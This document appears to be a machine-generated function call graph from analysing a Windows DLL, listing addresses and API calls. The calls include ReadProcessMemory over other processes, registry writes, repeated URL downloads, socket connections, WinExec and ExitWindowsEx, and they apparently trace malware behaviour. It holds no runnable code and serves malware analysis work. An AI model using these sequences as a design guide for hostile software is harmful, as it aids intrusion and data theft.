1000c100 11 API calls 5914->5915 5915->5913 5917 100091ea 5916->5917 5918 10004920 wvsprintfA 5917->5918 5919 10009226 5918->5919 6024 10008f80 5919->6024 5922 10004920 wvsprintfA 5923 1000924b 5922->5923 6030 100075d0 5923->6030 5930 1000c230 sprintf CreateFileA 5925->5930 5927 1000c11e 5928 1000c129 5927->5928 5940 1000c3e0 Netbios 5927->5940 5928->5856 5931 1000c280 DeviceIoControl GetLastError FormatMessageA 5930->5931 5932 1000c273 5930->5932 5933 1000c2d8 5931->5933 5934 1000c2c8 5931->5934 5932->5927 5949 1000c160 DeviceIoControl 5933->5949 5934->5927 5936 1000c305 5937 1000c319 CloseHandle 5936->5937 5938 1000c309 5936->5938 5939 1000c333 5937->5939 5938->5927 5939->5927 5941 1000c42c 5940->5941 5942 1000c43f 5940->5942 5941->5928 5943 1000c449 Netbios 5942->5943 5944 1000c48e Netbios 5942->5944 5947 1000c477 5942->5947 5943->5942 5943->5944 5945 1000c4f0 5944->5945 5946 1000c503 sprintf 5944->5946 5945->5928 5946->5928 5947->5944 5948 1000c47b 5947->5948 5948->5928 5949->5936 5996 10004ca0 RegOpenKeyExA 5950->5996 5952 1000aa61 5953 1000aa80 5952->5953 5954 1000aa68 5952->5954 5957 1000acc1 5953->5957 5958 1000aba2 5953->5958 5959 1000adc6 5953->5959 5960 1000ab07 5953->5960 5961 1000ade9 5953->5961 5962 1000ad8d 5953->5962 5963 1000abf1 5953->5963 5964 1000aa9f 5953->5964 5971 1000aa8f 5953->5971 5974 1000ad4a 5953->5974 5984 1000aac6 5953->5984 5992 1000ad85 5953->5992 5993 1000ac24 5953->5993 5997 1000ae31 5954->5997 5956 1000ae31 RegCloseKey 5968 1000aa7b 5956->5968 6010 10004bf0 RegEnumValueA 5957->6010 6004 10004c70 RegQueryValueExA 5958->6004 5965 10001000 lstrcpy 5959->5965 6003 10004c70 RegQueryValueExA 5960->6003 5966 10001000 lstrcpy 5961->5966 5976 10001000 lstrcpy 5962->5976 6008 10004c70 RegQueryValueExA 5963->6008 6002 10004c70 RegQueryValueExA 5964->6002 5979 1000addc 5965->5979 5966->5979 5968->5885 5971->5958 5971->5959 5971->5960 5971->5961 5971->5962 5971->5963 5971->5964 5971->5974 5971->5984 5971->5992 5982 10001000 lstrcpy 5974->5982 5983 1000adb1 5976->5983 5978 1000abc9 5978->5984 6005 10004920 5978->6005 5989 10004920 wvsprintfA 5979->5989 5980 1000ae22 5980->5885 5981 1000ad2b 5981->5984 5985 1000ad36 5981->5985 5986 1000ad75 5982->5986 5987 10004920 wvsprintfA 5983->5987 5984->5956 5985->5959 5985->5961 5985->5962 5985->5974 5985->5992 5991 10004920 wvsprintfA 5986->5991 5987->5992 5989->5992 5990 10004920 wvsprintfA 5990->5993 5991->5992 6011 100048c0 lstrcat 5992->6011 5993->5984 5993->5990 6009 10004bc0 RegEnumKeyExA 5993->6009 5994 1000ab49 strncat strncat 5995 1000ab2e 5994->5995 5995->5984 5995->5994 5996->5952 6012 10004c60 RegCloseKey 5997->6012 5999 1000ae3a 6013 10004c60 RegCloseKey 5999->6013 6001 1000ae46 6001->5968 6002->5984 6003->5995 6004->5978 6014 10004900 wvsprintfA 6005->6014 6007 10004934 6007->5984 6008->5984 6009->5993 6010->5981 6011->5980 6012->5999 6013->6001 6014->6007 6015->5890 6017 10004daa 6016->6017 6018 10004df1 GetModuleFileNameA strrchr 6017->6018 6019 10004dce 6017->6019 6021 10004f4a 6018->6021 6022 10004e1a 6018->6022 6020 10004e4d CreateFileA 6019->6020 6020->6021 6023 10004e73 8 API calls 6020->6023 6021->5830 6022->6020 6023->6021 6047 10008ea0 malloc 6024->6047 6026 10008fdc toupper 6027 10008f9e 6026->6027 6027->6026 6028 10008ff6 tolower 6027->6028 6029 1000901b 6027->6029 6028->6027 6029->5922 6031 10001000 lstrcpy 6030->6031 6032 100075e3 6031->6032 6049 10004940 InternetOpenA 6032->6049 6034 100075ec 6045 10007631 6034->6045 6050 10004960 InternetOpenUrlA 6034->6050 6036 1000760b 6037 10007612 6036->6037 6038 10007625 6036->6038 6051 100049b0 InternetCloseHandle 6037->6051 6053 100049b0 InternetCloseHandle 6038->6053 6041 10007618 6052 100049b0 InternetCloseHandle 6041->6052 6042 1000762b 6054 100049b0 InternetCloseHandle 6042->6054 6045->5912 6046 1000761e 6046->5912 6048 10008ecd 6047->6048 6048->6027 6049->6034 6050->6036 6051->6041 6052->6046 6053->6042 6054->6045 6056 1000929a 6055->6056 6057 10001000 lstrcpy 6056->6057 6058 100092a8 6057->6058 6059 10001000 lstrcpy 6058->6059 6060 100092b4 6059->6060 6061 100092d3 Sleep 6060->6061 6062 100069f0 lstrcmpiA CloseHandle CreateToolhelp32Snapshot Process32First Process32Next 6060->6062 6063 100092e0 GetSystemDirectoryA GetSystemDirectoryA 6060->6063 6061->6060 6062->6060 6064 10001000 lstrcpy 6063->6064 6065 1000933b 6064->6065 6066 10001000 lstrcpy 6065->6066 6067 10009373 6066->6067 6069 10004920 wvsprintfA 6067->6069 6071 10004da0 11 API calls 6067->6071 6076 100094a5 6067->6076 6148 10006dc0 6067->6148 6164 100074c0 6067->6164 6069->6067 6074 10009466 Sleep 6071->6074 6072 10009514 Sleep 6072->6067 6073 100094b6 wsprintfA 6188 10006240 6073->6188 6074->6067 6076->6072 6076->6073 6077 10005130 CreateFileA WriteFile CloseHandle 6076->6077 6077->6076 6209 100048e0 CreateMutexA 6078->6209 6080 10008e45 GetLastError 6081 10008e56 6080->6081 6082 10008e8d CloseHandle 6080->6082 6083 10008e62 CreateThread WaitForSingleObject CloseHandle Sleep 6081->6083 6083->6083 6210 10008ac0 6083->6210 6085 1000b5e9 6084->6085 6087 1000b0a0 97 API calls 6085->6087 6088 1000b681 Sleep 6085->6088 6431 10004b30 GetDriveTypeA 6085->6431 6087->6085 6088->6085 6432 10009050 6089->6432 6093 10001000 lstrcpy 6092->6093 6094 1000b705 6093->6094 6095 10001000 lstrcpy 6094->6095 6103 1000b73a 6095->6103 6096 10006dc0 6 API calls 6096->6103 6097 10004920 wvsprintfA 6097->6103 6098 100074c0 6 API calls 6098->6103 6099 1000b81b Sleep 6099->6103 6100 1000b8b0 6447 10009690 6100->6447 6102 1000b8c0 WinExec Sleep 6102->6103 6103->6096 6103->6097 6103->6098 6103->6099 6103->6100 6104 1000b89c wsprintfA 6103->6104 6104->6100 6106 100056d7 select 6105->6106 6118 10005729 6106->6118 6121 100056d3 6106->6121 6107 1000571c Sleep 6107->6106 6108 10005947 6109 10004da0 11 API calls 6108->6109 6110 10005956 6109->6110 6112 10005959 closesocket closesocket 6110->6112 6111 10005795 wsprintfA 6111->6118 6113 1000596f 6112->6113 6114 10005828 malloc htons 6115 1000587a htons htons htons htons 6114->6115 6120 10005810 6114->6120 6117 100058cb htons 6115->6117 6116 10005873 htons 6116->6115 6117->6121 6118->6106 6118->6108 6118->6111 6118->6114 6118->6120 6119 100058ec inet_addr 6119->6121 6120->6114 6120->6115 6120->6116 6121->6106 6121->6107 6121->6112 6121->6119 6129 10009544 6122->6129 6123 10006dc0 6 API calls 6123->6129 6124 10004920 wvsprintfA 6124->6129 6125 100074c0 6 API calls 6125->6129 6126 100095e3 Sleep 6126->6129 6127 1000967d Sleep 6127->6129 6128 10009657 6128->6127 6130 10009664 wsprintfA 6128->6130 6129->6123 6129->6124 6129->6125 6129->6126 6129->6127 6129->6128 6662 10006760 6130->6662 6133 1000b9ba 6132->6133 6134 1000ba01 RegOpenKeyExA 6133->6134 6135 1000ba25 RegQueryInfoKeyA 6134->6135 6136 1000baf8 RegCloseKey Sleep 6134->6136 6135->6136 6137 1000ba5b 6135->6137 6136->6134 6137->6136 6139 10010f36 6138->6139 6140 10008d54 WSAStartup 6139->6140 6725 100048e0 CreateMutexA 6140->6725 6142 10008d77 GetLastError 6143 10008ded CloseHandle 6142->6143 6145 10008d88 6142->6145 6146 10008db4 CreateThread WaitForSingleObject CloseHandle Sleep 6145->6146 6147 10008dab Sleep 6145->6147 6726 10007850 wsprintfA 6145->6726 6146->6145 6147->6145 6149 10004920 wvsprintfA 6148->6149 6150 10006df1 6149->6150 6194 10004a10 PathFileExistsA 6150->6194 6152 10006dfb 6153 10006e02 6152->6153 6195 10004b40 CreateFileA 6152->6195 6153->6067 6155 10006e2f 6156 10006e44 6155->6156 6157 10006e39 6155->6157 6196 10004b70 ReadFile 6156->6196 6157->6067 6159 10006e61 6197 10004a50 CloseHandle 6159->6197 6161 10006e67 6198 10004a20 StrStrIA 6161->6198 6163 10006e72 6163->6067 6165 10001000 lstrcpy 6164->6165 6166 100074dd 6165->6166 6199 10004940 InternetOpenA 6166->6199 6168 100074e6 6169 100074f3 6168->6169 6200 10004960 InternetOpenUrlA 6168->6200 6169->6067 6171 10007515 6172 10007539 6171->6172 6173 1000751e 6171->6173 6175 100075ab 6172->6175 6183 10007540 6172->6183 6201 100049b0 InternetCloseHandle 6173->6201 6205 100049b0 InternetCloseHandle 6175->6205 6177 10007524 6202 100049b0 InternetCloseHandle 6177->6202 6178 100075b1 6206 100049b0 InternetCloseHandle 6178->6206 6182 1000752a 6182->6067 6185 10007599 6183->6185 6203 10004990 InternetReadFile 6183->6203 6184 100075b7 6184->6067 6204 10004a50 CloseHandle 6185->6204 6187 100075a3 6187->6175 6207 10010f90 6188->6207 6191 10006373 6191->6076 6192 100062a9 6193 100062b2 strchr 6192->6193 6193->6191 6193->6193 6194->6152 6195->6155 6196->6159 6197->6161 6198->6163 6199->6168 6200->6171 6201->6177 6202->6182 6203->6183 6204->6187 6205->6178 6206->6184 6208 1000624a strchr 6207->6208 6208->6191 6208->6192 6209->6080 6231 10007640 6210->6231 6212 10008af1 6246 10006be0 setsockopt 6212->6246 6216 10008b08 6217 10008b1c send 6216->6217 6218 10008b3a closesocket 6217->6218 6226 10008b4f 6217->6226 6219 10008d24 6220 10008b59 select 6221 10008d17 InterlockedExchange 6220->6221 6220->6226 6221->6219 6222 10008c8e InterlockedExchange 6222->6220 6223 10008c4e closesocket 6223->6220 6224 10008cd1 strstr 6224->6226 6227 10008ce8 CreateThread 6224->6227 6226->6219 6226->6220 6226->6221 6226->6222 6226->6223 6226->6224 6229 10007160 6 API calls 6226->6229 6230 100049f0 ExitWindowsEx 6226->6230 6266 10007210 6226->6266 6276 100072a0 LoadLibraryA LoadLibraryA GetProcAddress GetProcAddress 6226->6276 6227->6220 6336 100084f0 6227->6336 6229->6226 6230->6226 6232 100077c6 WSAStartup htons 6231->6232 6233 100076d8 strstr 6231->6233 6278 100068b0 inet_addr inet_addr 6232->6278 6235 100076fa 6233->6235 6236 1000774d 6233->6236 6282 10007410 6235->6282 6242 10007775 strstr 6236->6242 6239 10007825 closesocket 6239->6212 6240 1000783a 6240->6212 6241 10007707 strstr 6241->6236 6244 10007718 strcspn strstr 6241->6244 6242->6232 6243 10007788 strcspn strncpy strcspn atoi 6242->6243 6243->6232 6244->6242 6245 10007733 strcspn strncpy 6244->6245 6245->6242 6247 10006c01 6246->6247 6248 10006f70 RegOpenKeyExA 6247->6248 6249 10006fe6 6248->6249 6250 10006fa9 6248->6250 6301 10006920 6249->6301 6307 10004c70 RegQueryValueExA 6250->6307 6253 10006fdc 6308 10004c60 RegCloseKey 6253->6308 6256 10006c40 2 API calls 6257 10007049 GlobalMemoryStatusEx 6256->6257 6258 10007071 6257->6258 6259 10004920 wvsprintfA 6258->6259 6260 10007087 GetSystemDefaultUILanguage 6259->6260 6309 10006e90 6260->6309 6262 100070fa 6263 10007101 6262->6263 6264 10004920 wvsprintfA 6262->6264 6263->6216 6265 1000714b 6264->6265 6265->6216 6267 10004920 wvsprintfA 6266->6267 6268 1000722b 6267->6268 6333 10004b40 CreateFileA 6268->6333 6270 1000724f 6271 10007259 6270->6271 6334 10004a60 WriteFile 6270->6334 6271->6226 6273 10007286 6335 10004a50 CloseHandle 6273->6335 6275 1000728c 6275->6226 6277 100072fd 6276->6277 6277->6226 6279 100068c6 6278->6279 6281 100068cc socket connect 6278->6281 6295 10004890 gethostbyname 6279->6295 6281->6239 6281->6240 6283 1000741a 6282->6283 6296 10004940 InternetOpenA 6283->6296 6285 10007443 6286 100074b1 6285->6286 6297 10004960 InternetOpenUrlA 6285->6297 6286->6241 6288 10007466 6289 10007497 6288->6289 6298 10004990 InternetReadFile 6288->6298 6300 100049b0 InternetCloseHandle 6289->6300 6292 10007491 6299 100049b0 InternetCloseHandle 6292->6299 6293 100074a0 6293->6241 6295->6281 6296->6285 6297->6288 6298->6292 6299->6289 6300->6293 6302 100069e4 6301->6302 6303 10006937 6301->6303 6302->6256 6303->6302 6304 1000694b GlobalAlloc 6303->6304 6305 10006993 6304->6305 6306 100069db GlobalFree 6304->6306 6305->6305 6305->6306 6306->6302 6307->6253 6308->6249 6310 10004920 wvsprintfA 6309->6310 6311 10006ec1 6310->6311 6327 10004a10 PathFileExistsA 6311->6327 6313 10006ecb 6314 10006ed2 6313->6314 6328 10004b40 CreateFileA 6313->6328 6314->6262 6316 10006eff 6317 10006f09 6316->6317 6329 10004b70 ReadFile 6316->6329 6317->6262 6319 10006f31 6330 10004a50 CloseHandle 6319->6330 6321 10006f37 6331 10004a20 StrStrIA 6321->6331 6323 10006f42 6324 10006f49 6323->6324 6332 10004a20 StrStrIA 6323->6332 6324->6262 6326 10006f5d 6326->6262 6327->6313 6328->6316 6329->6319 6330->6321 6331->6323 6332->6326 6333->6270 6334->6273 6335->6275 6337 10004f60 5 API calls 6336->6337 6338 10008504 6337->6338 6369 10008490 6338->6369 6340 10008511 6341 1000850c 6341->6340 6342 100074c0 6 API calls 6341->6342 6344 10008546 6342->6344 6343 10008aa6 6344->6343 6345 10006c40 2 API calls 6344->6345 6346 100085a9 GetTickCount srand 6345->6346 6348 1000863a rand 6346->6348 6349 10008643 6348->6349 6349->6348 6350 10008656 wsprintfA CreateDirectoryA rand 6349->6350 6351 100086b4 rand 6350->6351 6352 100086af 6350->6352 6353 100086c3 6351->6353 6354 100086c8 rand 6351->6354 6352->6351 6353->6354 6355 100086d7 6354->6355 6356 100086dc rand 6354->6356 6355->6356 6357 100086f0 rand 6356->6357 6358 100086eb 6356->6358 6359 10008704 wsprintfA wsprintfA 6357->6359 6360 100086ff 6357->6360 6358->6357 6376 10007f60 6359->6376 6360->6359 6362 10008745 6387 10007d80 CreateFileA WriteFile CloseHandle 6362->6387 6364 10008758 WinExec Sleep 6365 10008490 20 API calls 6364->6365 6366 10008778 6365->6366 6366->6343 6367 10008780 50 API calls 6366->6367 6388 10008180 6367->6388 6370 10004f60 5 API calls 6369->6370 6371 1000849e CreateMutexA GetLastError 6370->6371 6372 100084c0 6371->6372 6373 100084dc ReleaseMutex CloseHandle 6372->6373 6374 10004da0 11 API calls 6372->6374 6373->6341 6375 100084d4 6374->6375 6375->6373 6377 10001000 lstrcpy 6376->6377 6378 10007f9a 6377->6378 6379 10007fd5 _CxxThrowException 6378->6379 6380 10007fea 6378->6380 6379->6380 6381 10008028 6380->6381 6382 1000800d _CxxThrowException 6380->6382 6383 1000807e RegCloseKey 6381->6383 6384 1000803e lstrlen 6381->6384 6382->6362 6383->6362 6414 10007dd0 6384->6414 6387->6364 6389 1000822d 6388->6389 6390 10008233 6389->6390 6391 10008270 GetLastError 6389->6391 6392 100082aa wsprintfA 6389->6392 6390->6343 6391->6392 6396 1000827d 6391->6396 6393 100082d8 lstrlen 6392->6393 6394 100082f7 wsprintfA 6393->6394 6397 1000832e 6394->6397 6395 1000828e 6395->6343 6396->6392 6396->6395 6398 10008332 _CxxThrowException 6397->6398 6399 10008347 SetLastError 6397->6399 6398->6399 6401 10008376 _CxxThrowException 6399->6401 6402 1000838b RegCloseKey RegOpenKeyExA 6399->6402 6401->6402 6403 10008400 SetLastError 6402->6403 6404 100083eb _CxxThrowException 6402->6404 6406 10008455 RegCloseKey 6403->6406 6407 10008428 _CxxThrowException 6403->6407 6404->6403 6424 100080a0 6406->6424 6408 10008444 6407->6408 6409 1000844f 6407->6409 6408->6409 6411 10008449 GetLastError 6408->6411 6409->6343 6411->6409 6412 10008465 RegCloseKey 6412->6343 6415 10007e07 6414->6415 6416 10007e55 6414->6416 6417 10007e35 RegOpenKeyExA 6415->6417 6418 10007eb6 RegOpenKeyExA 6415->6418 6419 10007ee6 RegOpenKeyExA 6415->6419 6420 10007e0e 6415->6420 6423 10007f3b RegCloseKey RegCloseKey 6416->6423 6417->6416 6418->6416 6419->6416 6420->6416 6420->6417 6422 10007f27 WinExec WinExec WinExec 6422->6383 6423->6422 6425 100080b5 6424->6425 6426 10008104 GetLastError 6425->6426 6428 10008159 6425->6428 6429 10008129 6425->6429 6427 10008111 6426->6427 6426->6429 6427->6412 6428->6412 6429->6428 6430 10008149 Sleep 6429->6430 6430->6429 6431->6085 6443 10004b10 GetShortPathNameA 6432->6443 6434 10009089 6435 10001000 lstrcpy 6434->6435 6436 100090b0 6435->6436 6444 10004c20 RegCreateKeyExA 6436->6444 6438 100090be wsprintfA 6445 10004cc0 RegSetValueExA 6438->6445 6440 10009112 6446 10004c60 RegCloseKey 6440->6446 6442 1000911f 6443->6434 6444->6438 6445->6440 6446->6442 6449 100096b9 6447->6449 6448 10009f4e 6448->6102 6449->6448 6551 1000a020 6449->6551 6453 10009775 6453->6448 6560 10009f80 6453->6560 6456 10006000 InterlockedDecrement 6457 100097e2 6456->6457 6457->6448 6458 10009f80 5 API calls 6457->6458 6459 100097f8 6458->6459 6460 10009f80 5 API calls 6459->6460 6461 1000980e 6460->6461 6568 1000a0c0 6461->6568 6463 10009824 6464 10006000 InterlockedDecrement 6463->6464 6465 10009835 6464->6465 6466 100098b6 6465->6466 6467 10009f80 5 API calls 6465->6467 6469 10009f80 5 API calls 6466->6469 6468 1000985a 6467->6468 6470 1000a0c0 2 API calls 6468->6470 6474 100098d2 6469->6474 6471 10009870 6470->6471 6472 10006000 InterlockedDecrement 6471->6472 6473 10009881 6472->6473 6475 10009f80 5 API calls 6473->6475 6476 10006000 InterlockedDecrement 6474->6476 6477 1000988f 6475->6477 6484 1000990d 6476->6484 6478 1000a0c0 2 API calls 6477->6478 6479 100098a5 6478->6479 6480 10006000 InterlockedDecrement 6479->6480 6480->6466 6481 10006000 InterlockedDecrement 6483 1000996e 6481->6483 6482 10006000 InterlockedDecrement 6482->6448 6493 100099bc 6483->6493 6574 1000a410 6483->6574 6484->6481 6506 10009911 6484->6506 6486 1000999b 6607 1000a230 6486->6607 6489 10006000 InterlockedDecrement 6490 100099ad 6489->6490 6491 10006000 InterlockedDecrement 6490->6491 6491->6493 6492 10009a07 6496 10009a25 6492->6496 6615 100117f5 6492->6615 6493->6492 6493->6506 6610 1000a250 6493->6610 6497 10009a58 6496->6497 6618 1000a290 6496->6618 6499 10006000 InterlockedDecrement 6497->6499 6500 10009a70 6499->6500 6502 10009f80 5 API calls 6500->6502 6503 10009d6a 6500->6503 6510 10009af4 6500->6510 6501 10009f3b 6505 10006000 InterlockedDecrement 6501->6505 6514 10009ab9 6502->6514 6503->6501 6504 10009df5 6503->6504 6508 10009f80 5 API calls 6503->6508 6504->6501 6507 10009f80 5 API calls 6504->6507 6505->6506 6506->6482 6511 10009e21 6507->6511 6517 10009dba 6508->6517 6509 10009b30 6515 100117f5 _CxxThrowException 6509->6515 6522 10009b4e 6509->6522 6510->6503 6510->6509 6512 1000a250 5 API calls 6510->6512 6513 10009f80 5 API calls 6511->6513 6512->6509 6519 10009e33 6513->6519 6516 10006000 InterlockedDecrement 6514->6516 6515->6522 6516->6510 6518 10006000 InterlockedDecrement 6517->6518 6518->6504 6520 10009f80 5 API calls 6519->6520 6523 10009e9c 6520->6523 6521 10009be8 6526 100117f5 _CxxThrowException 6521->6526 6529 10009c06 6521->6529 6522->6521 6524 1000a250 5 API calls 6522->6524 6525 10006000 InterlockedDecrement 6523->6525 6524->6521 6527 10009ed4 6525->6527 6526->6529 6528 10009f80 5 API calls 6527->6528 6531 10009ee2 6528->6531 6530 10006000 InterlockedDecrement 6529->6530 6533 10009c41 6530->6533 6534 10006000 InterlockedDecrement 6531->6534 6532 10009c67 6537 100117f5 _CxxThrowException 6532->6537 6541 10009c85 6532->6541 6533->6532 6535 1000a250 5 API calls 6533->6535 6536 10009f29 6534->6536 6535->6532 6538 10006000 InterlockedDecrement 6536->6538 6537->6541 6539 10009f32 6538->6539 6540 10006000 InterlockedDecrement 6539->6540 6540->6501 6542 10006000 InterlockedDecrement 6541->6542 6544 10009cc0 6542->6544 6543 10009ce6 6546 100117f5 _CxxThrowException 6543->6546 6547 10009d04 6543->6547 6544->6543 6545 1000a250 5 API calls 6544->6545 6545->6543 6546->6547 6548 10006000 InterlockedDecrement 6547->6548 6549 10009d4d 6548->6549 6550 10006000 InterlockedDecrement 6549->6550 6550->6503 6552 1000a041 6551->6552 6553 1000a084 6552->6553 6556 100117f5 _CxxThrowException 6552->6556 6554 10009738 6553->6554 6555 100117f5 _CxxThrowException 6553->6555 6557 10006000 6554->6557 6555->6554 6556->6553 6558 1000600a InterlockedDecrement 6557->6558 6559 10006018 6557->6559 6558->6559 6559->6453 6561 10009fa1 6560->6561 6562 10009fe3 6561->6562 6622 100116b0 6561->6622 6564 100097a8 6562->6564 6566 100117f5 _CxxThrowException 6562->6566 6564->6456 6566->6564 6567 100117f5 _CxxThrowException 6567->6562 6571 1000a0e9 6568->6571 6569 1000a1d7 InterlockedDecrement 6570 1000a1e5 6569->6570 6570->6463 6572 100117f5 _CxxThrowException 6571->6572 6573 1000a169 6571->6573 6572->6573 6573->6569 6573->6570 6575 1000a5f4 6574->6575 6579 1000a448 6574->6579 6576 1000a624 6575->6576 6577 1000a602 InterlockedIncrement 6575->6577 6576->6486 6577->6576 6578 1000a614 InterlockedDecrement 6577->6578 6578->6576 6579->6575 6580 1000a492 6579->6580 6581 1000a250 5 API calls 6579->6581 6582 100117f5 _CxxThrowException 6580->6582 6583 1000a4ab 6580->6583 6581->6580 6582->6583 6584 1000a4e7 6583->6584 6631 10006050 InterlockedDecrement 6583->6631 6586 1000a54b 6584->6586 6587 1000a4ff 6584->6587 6594 1000a537 6584->6594 6588 1000a596 6586->6588 6589 1000a554 6586->6589 6590 10006050 InterlockedDecrement 6587->6590 6593 1000a510 6587->6593 6647 1000a770 6588->6647 6637 1000a7d0 6589->6637 6590->6593 6592 1000a563 6596 1000a578 6592->6596 6597 1000a56e InterlockedIncrement 6592->6597 6593->6594 6633 1000a730 6593->6633 6594->6575 6599 100117f5 _CxxThrowException 6594->6599 6602 10006000 InterlockedDecrement 6596->6602 6597->6596 6599->6575 6604 1000a581 6602->6604 6604->6594 6605 10006050 InterlockedDecrement 6604->6605 6605->6594 6606 100117f5 _CxxThrowException 6606->6594 6608 100099a4 6607->6608 6609 1000a236 InterlockedIncrement 6607->6609 6608->6489 6609->6608 6611 100116b0 5 API calls 6610->6611 6613 1000a26c 6611->6613 6612 1000a280 6612->6492 6613->6612 6614 100117f5 _CxxThrowException 6613->6614 6614->6612 6656 10011803 6615->6656 6619 1000a2b3 6618->6619 6620 100117f5 _CxxThrowException 6619->6620 6621 1000a305 6619->6621 6620->6621 6621->6497 6623 100116bf lstrlen 6622->6623 6627 10009fcf 6622->6627 6624 10010f90 6623->6624 6625 100116d8 MultiByteToWideChar 6624->6625 6626 100116f3 GetLastError 6625->6626 6625->6627 6628 1001170d 6626->6628 6629 100116ff GetLastError 6626->6629 6627->6562 6627->6567 6630 100117f5 _CxxThrowException 6628->6630 6629->6628 6630->6627 6632 10006062 6631->6632 6632->6584 6634 1000a74d 6633->6634 6635 1000a761 6634->6635 6636 100117f5 _CxxThrowException 6634->6636 6635->6594 6636->6635 6646 1000a80d 6637->6646 6638 1000a961 InterlockedIncrement 6639 1000a973 InterlockedDecrement 6638->6639 6641 1000a981 6638->6641 6639->6641 6640 1000a947 6640->6638 6640->6641 6641->6592 6642 100117f5 _CxxThrowException 6642->6646 6643 1000a290 _CxxThrowException 6643->6646 6644 1000a8de InterlockedDecrement 6644->6646 6645 1000a912 InterlockedDecrement 6645->6646 6646->6640 6646->6642 6646->6643 6646->6644 6646->6645 6648 1000a77c 6647->6648 6649 1000a5b2 6648->6649 6650 100117f5 _CxxThrowException 6648->6650 6651 1000a650 6649->6651 6650->6649 6652 1000a670 InterlockedDecrement 6651->6652 6654 1000a67e 6651->6654 6652->6654 6653 1000a5c0 6653->6594 6653->6606 6654->6653 6655 100117f5 _CxxThrowException 6654->6655 6655->6653 6660 10011827 6656->6660 6659 10011800 6659->6496 6661 10011819 _CxxThrowException 6660->6661 6661->6659 6663 1000676a 6662->6663 6675 100060e0 6663->6675 6665 10006772 wsprintfA 6666 10006240 2 API calls 6665->6666 6667 100067cb wsprintfA wsprintfA CreateDirectoryA 6666->6667 6678 10005130 CreateFileA WriteFile CloseHandle 6667->6678 6669 10006847 6679 10005a10 6669->6679 6672 10006863 OpenProcess 6673 1000689d 6672->6673 6674 10006879 CreateThread 6672->6674 6673->6127 6674->6673 6709 10006630 6674->6709 6676 1000611f 6675->6676 6677 10006152 10 API calls 6676->6677 6677->6665 6678->6669 6681 10005a2f 6679->6681 6680 10005acb 6682 100117f5 _CxxThrowException 6680->6682 6684 10005aec 6680->6684 6681->6680 6683 100117f5 _CxxThrowException 6681->6683 6682->6684 6683->6680 6685 10005b29 wcscat 6684->6685 6686 10006050 InterlockedDecrement 6684->6686 6689 10005b80 6685->6689 6686->6685 6688 10005bc1 6690 100117f5 _CxxThrowException 6688->6690 6691 10005be2 6688->6691 6689->6688 6692 100117f5 _CxxThrowException 6689->6692 6690->6691 6693 10005c42 6691->6693 6694 100116b0 5 API calls 6691->6694 6692->6688 6696 100117f5 _CxxThrowException 6693->6696 6698 10005c60 6693->6698 6695 10005c29 6694->6695 6695->6693 6697 100117f5 _CxxThrowException 6695->6697 6696->6698 6697->6693 6699 10005c95 6698->6699 6700 10006050 InterlockedDecrement 6698->6700 6701 10006050 InterlockedDecrement 6699->6701 6706 10005cab 6699->6706 6700->6699 6701->6706 6702 10005f97 6702->6672 6702->6673 6703 100117f5 _CxxThrowException 6703->6706 6704 10005e34 InterlockedDecrement 6705 10005e4b _strcmpi 6704->6705 6704->6706 6705->6706 6706->6702 6706->6703 6706->6704 6706->6705 6707 10005f55 InterlockedDecrement 6706->6707 6708 10011725 wcslen WideCharToMultiByte GetLastError GetLastError _CxxThrowException 6706->6708 6707->6706 6708->6706 6712 1000665e 6709->6712 6710 10006731 6713 10006737 CloseHandle 6710->6713 6711 1000667f VirtualQueryEx 6711->6710 6711->6712 6712->6710 6712->6711 6714 100066d4 ReadProcessMemory 6712->6714 6716 10006380 6712->6716 6714->6712 6717 1000638a 6716->6717 6718 100063ea wsprintfA 6717->6718 6720 100065d3 6717->6720 6719 10006240 2 API calls 6718->6719 6721 1000643c wsprintfA wsprintfA CreateDirectoryA 6719->6721 6720->6712 6724 10005130 CreateFileA WriteFile CloseHandle 6721->6724 6723 100064c7 14 API calls 6723->6717 6724->6723 6725->6142 6727 100078c3 6726->6727 6745 10004940 InternetOpenA 6727->6745 6729 100078eb 6730 100078f2 6729->6730 6746 10004960 InternetOpenUrlA 6729->6746 6730->6145 6732 10007924 6732->6145 6733 1000791a 6733->6732 6739 10007968 6733->6739 6735 100079b9 MultiByteToWideChar 6735->6739 6736 100079d8 MultiByteToWideChar WideCharToMultiByte 6736->6739 6737 10007a0e WideCharToMultiByte 6737->6739 6738 10007a57 6740 10007b43 wsprintfA 6738->6740 6742 10007ad1 6738->6742 6739->6735 6739->6736 6739->6737 6739->6738 6747 10004990 InternetReadFile 6739->6747 6741 10007b64 6740->6741 6743 10007b96 strrchr 6741->6743 6742->6145 6744 10007ba6 6743->6744 6744->6145 6745->6729 6746->6733 6747->6739 6748 f307dd 6749 f3080d 6748->6749 6750 f3083b VirtualAlloc 6749->6750 6753 f3086a 6750->6753 6751 f3090c MessageBoxA ExitProcess 6752 f30926 6755 f30954 VirtualFree 6752->6755 6753->6751 6753->6752 6754 f308ab 6753->6754 6756 f308bb wsprintfA 6754->6756 6758 f308cb wsprintfA 6754->6758 6759 f30906 6756->6759 6758->6759 6759->6751 7913 10011330 7914 1001130a 7913->7914 7914->7913 7915 10011a66 9 API calls 7914->7915 7915->7914 7269 10010150 7272 10010170 7269->7272 7271 10010165 7273 100101e9 7272->7273 7275 1001017f 7272->7275 7274 100101f0 ReadFile 7273->7274 7273->7275 7274->7275 7275->7271 6776 f30fa4 VirtualProtect 6777 f30fe3 VirtualProtect 6776->6777 6778 f30fdf 6776->6778 6778->6777 7308 10001170 7309 10001180 7308->7309 7310 10001000 lstrcpy 7309->7310 7311 1000118a 7310->7311 7303 f30983 7304 f3098d LoadLibraryA 7303->7304 7305 f309a5 7304->7305 7305->7304 7306 f309ab GetProcAddress 7305->7306 7307 f309c8 7305->7307 7306->7305 7987 10001770 7988 10001780 7987->7988 7989 10001000 lstrcpy 7988->7989 7990 1000178a GetProcAddress 7989->7990 5783 10002580 5784 10002590 5783->5784 5787 10001000 5784->5787 5786 1000259a GetProcAddress 5788 1000102c 5787->5788 5789 1000114e lstrcpy 5788->5789 5790 10001161 5789->5790 5790->5786 7357 10005990 7358 10005995 7357->7358 7361 10010feb 7358->7361 7364 10010fbf 7361->7364 7363 100059ba 7365 10010fd4 __dllonexit 7364->7365 7366 10010fc8 _onexit 7364->7366 7365->7363 7366->7363 8044 1000fba0 8045 1000fbab 8044->8045 8046 1000fbad 8044->8046 8049 1000fbf0 8046->8049 8048 1000fbbc 8050 1000fc05 8049->8050 8051 1000fcc4 WriteFile 8050->8051 8052 1000fc7c 8050->8052 8051->8048 8052->8048 8088 1000a7b0 8089 1000a7b7 8088->8089 8090 1000a7c1 8089->8090 8091 100117f5 